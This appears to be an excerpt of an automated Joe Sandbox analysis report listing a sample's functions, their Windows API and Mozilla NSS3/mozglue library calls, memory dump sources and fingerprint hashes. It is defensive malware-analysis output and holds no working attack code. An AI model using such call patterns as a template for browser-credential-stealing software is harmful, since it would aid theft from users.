                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1957633107-0
                                                                                          • Opcode ID: 00cbf0abc55fda43c1b3429b4286ddc25170871427d44918283da6e07bb72ef4
                                                                                          • Instruction ID: 33fa7798db2bb1897e9bbe7aefe262c0248bff984176e0a61f3c0a7097dd74cc
                                                                                          • Opcode Fuzzy Hash: 00cbf0abc55fda43c1b3429b4286ddc25170871427d44918283da6e07bb72ef4
                                                                                          • Instruction Fuzzy Hash: A76190B9E042058BEB00CF6AD894B9EB7B1FF5A348F144064DC55A7B01F731E859DBA1
                                                                                          Function 6CB62C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(6CB63F23,?,6CB5E477,?,?,?,00000001,00000000,?,?,6CB63F23,?), ref: 6CB62C62
                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6CB5E477,?,?,?,00000001,00000000,?,?,6CB63F23,?), ref: 6CB62C76
                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,6CB5E477,?,?,?,00000001,00000000,?,?,6CB63F23,?), ref: 6CB62C86
                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,6CB5E477,?,?,?,00000001,00000000,?,?,6CB63F23,?), ref: 6CB62C93
                                                                                            • Part of subcall function 6CBEDD70: TlsGetValue.KERNEL32 ref: 6CBEDD8C
                                                                                            • Part of subcall function 6CBEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBEDDB4
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6CB5E477,?,?,?,00000001,00000000,?,?,6CB63F23,?), ref: 6CB62CC6
                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CB5E477,?,?,?,00000001,00000000,?,?,6CB63F23,?), ref: 6CB62CDA
                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CB5E477,?,?,?,00000001,00000000,?,?,6CB63F23), ref: 6CB62CEA
                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CB5E477,?,?,?,00000001,00000000,?), ref: 6CB62CF7
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CB5E477,?,?,?,00000001,00000000,?), ref: 6CB62D4D
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB62D61
                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6CB62D71
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB62D7E
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307AD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307CD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307D6
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAC204A), ref: 6CB307E4
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,6CAC204A), ref: 6CB30864
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB30880
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,6CAC204A), ref: 6CB308CB
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308D7
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                          • String ID:
                                                                                          • API String ID: 2446853827-0
                                                                                          • Opcode ID: a3f72ad9ab3a58d0e1be66eeba59df726e33870fb4d1e5cc8d75911a3a078f35
                                                                                          • Instruction ID: 159f6ab64db8cc41ebeb096a0db57074050d7d18ff84fc27f5b4a8a322bdebf7
                                                                                          • Opcode Fuzzy Hash: a3f72ad9ab3a58d0e1be66eeba59df726e33870fb4d1e5cc8d75911a3a078f35
                                                                                          • Instruction Fuzzy Hash: FA51E4B6D00655ABEB009F25EC458AA7778FF1935CB048520ED1897B11E731ED68C7E2
                                                                                          Function 6CAC4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4C97
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4CB0
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4CC9
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4D11
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4D2A
                                                                                          • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4D4A
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4D57
                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4D97
                                                                                          • PR_Lock.NSS3(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4DBA
                                                                                          • PR_WaitCondVar.NSS3 ref: 6CAC4DD4
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4DE6
                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4DEF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                          • String ID:
                                                                                          • API String ID: 3388019835-0
                                                                                          • Opcode ID: 0ec966222eca346a65b7ec30b4d3fd49c5468c82534f92a2a6664dc837bec5af
                                                                                          • Instruction ID: 874c12823f6883879d67dcaefb8be9667e9f5b3a3370d0339a7b2374828ef104
                                                                                          • Opcode Fuzzy Hash: 0ec966222eca346a65b7ec30b4d3fd49c5468c82534f92a2a6664dc837bec5af
                                                                                          • Instruction Fuzzy Hash: 91416CB5A18A65CFCB00AFB9E48856DBBB4FF05314B094669D858DB720E730D884CB86
                                                                                          Function 00418AB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: image/jpeg
                                                                                          • API String ID: 0-3785015651
                                                                                          • Opcode ID: e3d6fb441b76b068049a3a71428c1239af9f18144c76eb4c8f2b9333fba61afe
                                                                                          • Instruction ID: ab8c993fcc5868c7862916c534b465bb792f4261399987fcbf2c6f11a1cf59ff
                                                                                          • Opcode Fuzzy Hash: e3d6fb441b76b068049a3a71428c1239af9f18144c76eb4c8f2b9333fba61afe
                                                                                          • Instruction Fuzzy Hash: 2E711CB1A10208ABDB14EFE4DC89FEEB779BF48700F108509F516AB290DB74A945CB65
                                                                                          Function 6CA23480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CA23284,?,?,6CA456F6), ref: 6CA23492
                                                                                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CA23284,?,?,6CA456F6), ref: 6CA234A9
                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CA23284,?,?,6CA456F6), ref: 6CA234EF
                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CA2350E
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA23522
                                                                                          • __aulldiv.LIBCMT ref: 6CA23552
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CA23284,?,?,6CA456F6), ref: 6CA2357C
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CA23284,?,?,6CA456F6), ref: 6CA23592
                                                                                            • Part of subcall function 6CA5AB89: EnterCriticalSection.KERNEL32(6CAAE370,?,?,?,6CA234DE,6CAAF6CC,?,?,?,?,?,?,?,6CA23284), ref: 6CA5AB94
                                                                                            • Part of subcall function 6CA5AB89: LeaveCriticalSection.KERNEL32(6CAAE370,?,6CA234DE,6CAAF6CC,?,?,?,?,?,?,?,6CA23284,?,?,6CA456F6), ref: 6CA5ABD1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                          • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                          • API String ID: 3634367004-706389432
                                                                                          • Opcode ID: 1864f9d51ecca51ccd86b04c3dcd833ce316621bc6ee5eb4233cf57c2dc91772
                                                                                          • Instruction ID: df3136c00ed4e4c59de1e439895c9838dc35cd606f758f5a99f467700fc63b74
                                                                                          • Opcode Fuzzy Hash: 1864f9d51ecca51ccd86b04c3dcd833ce316621bc6ee5eb4233cf57c2dc91772
                                                                                          • Instruction Fuzzy Hash: A531D270B0134B9FDF18CFF5E948AAE77B9FB46304F088119E54593660EB349986CB60
                                                                                          Function 6CB8ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CB8DE64), ref: 6CB8ED0C
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8ED22
                                                                                            • Part of subcall function 6CB9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC718D0,?), ref: 6CB9B095
                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6CB8ED4A
                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6CB8ED6B
                                                                                          • PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CB8ED38
                                                                                            • Part of subcall function 6CAC4C70: TlsGetValue.KERNEL32(?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4C97
                                                                                            • Part of subcall function 6CAC4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4CB0
                                                                                            • Part of subcall function 6CAC4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4CC9
                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6CB8ED52
                                                                                          • PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CB8ED83
                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6CB8ED95
                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6CB8ED9D
                                                                                            • Part of subcall function 6CBA64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CBA127C,00000000,00000000,00000000), ref: 6CBA650E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                          • String ID: security
                                                                                          • API String ID: 3323615905-3315324353
                                                                                          • Opcode ID: 186b7c23a543c8de3f8dc241036711c75e6bdf1eb27c926eb0f69352ec2b9564
                                                                                          • Instruction ID: c5bf6cc7c8ebd1728d04990d339d769f0f2038cde1403f45221b30257f5b6e28
                                                                                          • Opcode Fuzzy Hash: 186b7c23a543c8de3f8dc241036711c75e6bdf1eb27c926eb0f69352ec2b9564
                                                                                          • Instruction Fuzzy Hash: A5116D799052E4ABE71057A5AC44BBF7278EF0270CF040424E86563E50FB20A90E87E7
                                                                                          Function 6CB72CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_InitToken), ref: 6CB72CEC
                                                                                          • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CB72D07
                                                                                            • Part of subcall function 6CC509D0: PR_Now.NSS3 ref: 6CC50A22
                                                                                            • Part of subcall function 6CC509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC50A35
                                                                                            • Part of subcall function 6CC509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC50A66
                                                                                            • Part of subcall function 6CC509D0: PR_GetCurrentThread.NSS3 ref: 6CC50A70
                                                                                            • Part of subcall function 6CC509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC50A9D
                                                                                            • Part of subcall function 6CC509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC50AC8
                                                                                            • Part of subcall function 6CC509D0: PR_vsmprintf.NSS3(?,?), ref: 6CC50AE8
                                                                                            • Part of subcall function 6CC509D0: EnterCriticalSection.KERNEL32(?), ref: 6CC50B19
                                                                                            • Part of subcall function 6CC509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC50B48
                                                                                            • Part of subcall function 6CC509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC50C76
                                                                                            • Part of subcall function 6CC509D0: PR_LogFlush.NSS3 ref: 6CC50C7E
                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB72D22
                                                                                            • Part of subcall function 6CC509D0: OutputDebugStringA.KERNEL32(?), ref: 6CC50B88
                                                                                            • Part of subcall function 6CC509D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC50C5D
                                                                                            • Part of subcall function 6CC509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC50C8D
                                                                                            • Part of subcall function 6CC509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC50C9C
                                                                                            • Part of subcall function 6CC509D0: OutputDebugStringA.KERNEL32(?), ref: 6CC50CD1
                                                                                            • Part of subcall function 6CC509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC50CEC
                                                                                            • Part of subcall function 6CC509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC50CFB
                                                                                            • Part of subcall function 6CC509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC50D16
                                                                                            • Part of subcall function 6CC509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC50D26
                                                                                            • Part of subcall function 6CC509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC50D35
                                                                                            • Part of subcall function 6CC509D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC50D65
                                                                                            • Part of subcall function 6CC509D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC50D70
                                                                                            • Part of subcall function 6CC509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC50D90
                                                                                            • Part of subcall function 6CC509D0: free.MOZGLUE(00000000), ref: 6CC50D99
                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB72D3B
                                                                                            • Part of subcall function 6CC509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC50BAB
                                                                                            • Part of subcall function 6CC509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC50BBA
                                                                                            • Part of subcall function 6CC509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC50D7E
                                                                                          • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CB72D54
                                                                                            • Part of subcall function 6CC509D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC50BCB
                                                                                            • Part of subcall function 6CC509D0: EnterCriticalSection.KERNEL32(?), ref: 6CC50BDE
                                                                                            • Part of subcall function 6CC509D0: OutputDebugStringA.KERNEL32(?), ref: 6CC50C16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                          • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                          • API String ID: 420000887-1567254798
                                                                                          • Opcode ID: d79bf6f4992b703a5c2c26c331c4aea22104690cee94501fbc6aaa3cacb26043
                                                                                          • Instruction ID: 3c3aa17e6e6aecb9bc5deb49c7c39c5250c980b7aadfff3af43ec40bb32b8261
                                                                                          • Opcode Fuzzy Hash: d79bf6f4992b703a5c2c26c331c4aea22104690cee94501fbc6aaa3cacb26043
                                                                                          • Instruction Fuzzy Hash: 2D21CB766001A4EFDB109FA5EE9CA8D3BB1EB4231DF444014F918D7622DB309C59CB72
                                                                                          Function 6CC50EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(Aborting,?,6CB32357), ref: 6CC50EB8
                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CB32357), ref: 6CC50EC0
                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC50EE6
                                                                                            • Part of subcall function 6CC509D0: PR_Now.NSS3 ref: 6CC50A22
                                                                                            • Part of subcall function 6CC509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC50A35
                                                                                            • Part of subcall function 6CC509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC50A66
                                                                                            • Part of subcall function 6CC509D0: PR_GetCurrentThread.NSS3 ref: 6CC50A70
                                                                                            • Part of subcall function 6CC509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC50A9D
                                                                                            • Part of subcall function 6CC509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC50AC8
                                                                                            • Part of subcall function 6CC509D0: PR_vsmprintf.NSS3(?,?), ref: 6CC50AE8
                                                                                            • Part of subcall function 6CC509D0: EnterCriticalSection.KERNEL32(?), ref: 6CC50B19
                                                                                            • Part of subcall function 6CC509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC50B48
                                                                                            • Part of subcall function 6CC509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC50C76
                                                                                            • Part of subcall function 6CC509D0: PR_LogFlush.NSS3 ref: 6CC50C7E
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC50EFA
                                                                                            • Part of subcall function 6CB3AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB3AF0E
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F16
                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F1C
                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F25
                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F2B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                          • API String ID: 3905088656-1374795319
                                                                                          • Opcode ID: 3c4c357a7988e18e6d900776a40c7d9ad1954aafbc0bd90f6a7aa75005342770
                                                                                          • Instruction ID: 60877dfabdb466fd8f7c0453968ef95e9f021af937a6e6f4177959dc9c3bbe9d
                                                                                          • Opcode Fuzzy Hash: 3c4c357a7988e18e6d900776a40c7d9ad1954aafbc0bd90f6a7aa75005342770
                                                                                          • Instruction Fuzzy Hash: E9F062F69001147BDE017FA0DC4AC9B3E3DDF86768F444464FD0956612EA36EA2496B2
                                                                                          Function 6CBB4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6CBB4DCB
                                                                                            • Part of subcall function 6CBA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB487ED,00000800,6CB3EF74,00000000), ref: 6CBA1000
                                                                                            • Part of subcall function 6CBA0FF0: PR_NewLock.NSS3(?,00000800,6CB3EF74,00000000), ref: 6CBA1016
                                                                                            • Part of subcall function 6CBA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB487ED,00000008,?,00000800,6CB3EF74,00000000), ref: 6CBA102B
